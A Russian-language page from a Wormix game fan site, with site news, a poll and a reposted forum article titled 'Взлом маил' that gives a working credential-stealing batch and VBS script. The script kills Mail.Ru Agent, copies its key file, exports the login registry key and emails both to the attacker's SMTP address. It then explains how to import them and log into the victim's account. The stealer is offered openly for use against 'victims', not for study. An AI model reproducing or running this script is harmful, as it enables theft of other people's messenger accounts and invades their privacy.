Внимание! Новая версия сайта находится здесь - wormixtest.com Все ваши новости, профили и пароли были перенесены.
+ Можно играть на тестовом сервере.


Авторизация
Главные новости
Сайт на реконструкции
Сайт на реконструкции



Сайт долго время был мёртв и сейчас останется в качестве доброй памяти у старых игроков, которые могут вспомнить о его существовании и зайти сюда для ностальгии.

- убрана вся реклама
- исправлены кодировки чата, комментариев и т.д.
- исправлены ошибки при переходе на новую версию php
- исправлена регистрация


Если вдруг вы заметите, что что-то не работает, можете написать в эту тему или же мне в личку.

 

Для игры на тестовом сервере и в целом новый сайт - wormixtest.com

Внимание! Нам требуется Главный редактор

Друзья! Внимание ! Нам требуется Главный редактор для развития сайта !  

Если Ты:

-ответственный

-аккуратный

-умеешь играть в wormiks

-способен администровать сайт и добавлять новости, то напиши нам в личку

Прохождение новых боссов
dada
Типо помощь и конкурса)))
Всё в средине))
Как вытащить Auth key с Вормикса, два метода!
И так знаю, что всем известно, но для нубов пойдет! =)

{sl2}
Опросы Вормикс.ру
Какой босс Вормикс Вами убивался сложнее всего?
Фермер
Охотник
Маньяки
Минер
Самурай
Сержант
Пылающие зомби
Блуждающий дух
Шаман вуду
Иллюзионист
Викинги
Пираты
Мастер ветра
Якудза
Оживший капитан
Ромео и Джульетта
Король мертвых
Древний призрак
Инженер
Стражи недр
Темный рыцарь
Ассасин
Алхимик
Взлом маил
Маил.ру агент хранит пароли в 2 файлах, а точнее инфу о пользователях в реестре, и фаил ключа (шифр) в папке Учетных записей

1) Реестр HKEY_CURRENT_USER\Software\Mail.Ru\Agent\magent_logins3
2) Папка учетных записей (и сразу путь к нужной папке) %appdata%\Mra\Update
Теперь Надо решить как это все стырить с компа "жертвы"

Собстно код:

Код
@echo off
taskkill /f /im "magent.exe"
attrib -h -s "%appdata%\mra\update\ver.txt"
ping 127.0.0.1 -n 5 >nul
copy "%appdata%\Mra\Update\ver.txt" "%windir%\keyn.txt"
ping 127.0.0.1 -n 5 >nul
attrib +h +s "%appdata%\mra\update\ver.txt"
regedit.exe -ea %windir%\keym.reg HKEY_CURRENT_USER\Software\Mail.Ru\Agent\magent_logins3
echo create script
echo Set objMessage = CreateObject("CDO.Message") >> step2.vbs
echo objMessage.Subject = "PassGraber by WishNine" >> step2.vbs
echo objMessage.Sender = "e-mail адрес" >> step2.vbs
echo objMessage.To = "e-mail адрес кому придет пароль" >> step2.vbs
echo objMessage.TextBody = "%userdomain%" >> step2.vbs
echo objMessage.AddAttachment "%windir%\keym.reg" >> step2.vbs
echo objMessage.AddAttachment "%windir%\keyn.txt" >> step2.vbs
echo objMessage.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2 >> step2.vbs
echo objMessage.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1 >> step2.vbs
echo objMessage.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "адрес smtp сервера" >> step2.vbs
echo objMessage.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25 (порт) >> step2.vbs
echo objMessage.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "e-mail адрес" >> step2.vbs
echo objMessage.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "пароль от почты" >> step2.vbs
echo objMessage.Configuration.Fields.Update >> step2.vbs
echo objMessage.Send >> step2.vbs
ping 127.0.0.1 -n 5 >nul
step2.vbs
del step2.vbs
"%programfiles%\mail.ru\agent\magent.exe"
"%appdata%\mail.ru\agent\magent.exe"


А теперь опишу "че" и "как"

Выключается сам процесс Агента "magent.exe"

Снимаются атрибуты -hs с файла "ключа" ver.txt

Проходит 5 сек (хз зачем но без этого иногда не срабатывает)

Копируется файл ver.txt в папку Windows с именем keyn.txt

Снова ставятся атрибуты +hs

Проходит 5 сек

Экспорт каталога реестра с учетными записями в Windows с именем keym.reg

Далее создается vbs скрипт отправки файлов keyn.txt и keym.reg по электронной почте

e-mail адрес указываем "свой" ну или создаем левое мыло для этого чуда
e-mail адрес кому придет пароль указываем свой e-mail куда придут эти файлы
адрес smtp сервера Указываем адрес если Yandex то smtp.yandex.ru если mail.ru то smtp.mail.ru и тд.
25 (порт) указываем 25, вроде стандартный:D
e-mail адрес указываем e-mail до собаки т.е если superhacker@yandex.ru то указываем Superhacker.
пароль от почты пароль от вашей почты, от левого ящика.
Проходит 5 сек

Снова запускается процесс "magent.exe"

++++++++++++++++++++++++++++++++++++++

Что теперь делать?

к вам на ящик придет письмо с 2-мя вложениями. Мой скрин.





Далее заходите в агент удаляете свою учетную запись.

запускаете файл keym.reg (он внесет "чужие данные" в агент

Далее переименовываете файл keyn.txt в key.txt и копируете (заменяете) его в %appdata%\Mra\Update (с выключенным агентом, так-как с включенным не скопирует (не заменит)

Включаете агент, и вуаля! Вы зашли в чужой профиль.

К сожалению пароль узнать "не получиться" почему в скобках? потому-что полученный из 2 файлов (реестр+шифр) мы получим md5 ключ. Но некоторые пароли узнать можно с помощью программы DeCryptICQ (ссылка сразу на страницу автора, и FAQ по ней.

Всем спасибо за внимание, если будут вопросы пишите.

P.S Если кто-то знает как скопировать ver.txt без "убивания" процесса "magent.exe" напишите пжалста.

WishNine.
**************************************************************************************
вот источник http://batnik.com/delaem_virys/voruem-uchetnuyu-zapis-mail-ru-batvbs.html





Уважаемый посетитель, Вы зашли на сайт, как незарегистрированный пользователь.
Мы рекомендуем Вам зарегистрироваться либо авторизоваться на сайте под своим ником.
  • Пользователи
  • Репа: 4866
  • Пишет: DraMe4in |
  • Сообщений: 750 |
  • 29 декабря, 00:01
  • #
Было бы классно если бы не содрал, а своим написал
0
  • Пользователи
  • Репа: 1270
  • Пишет: m0ntys |
  • Сообщений: 790 |
  • 29 декабря, 13:23
  • #
DraMe4in,
тебе приятно когда много ошибок в тексте?
0
Информация
Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.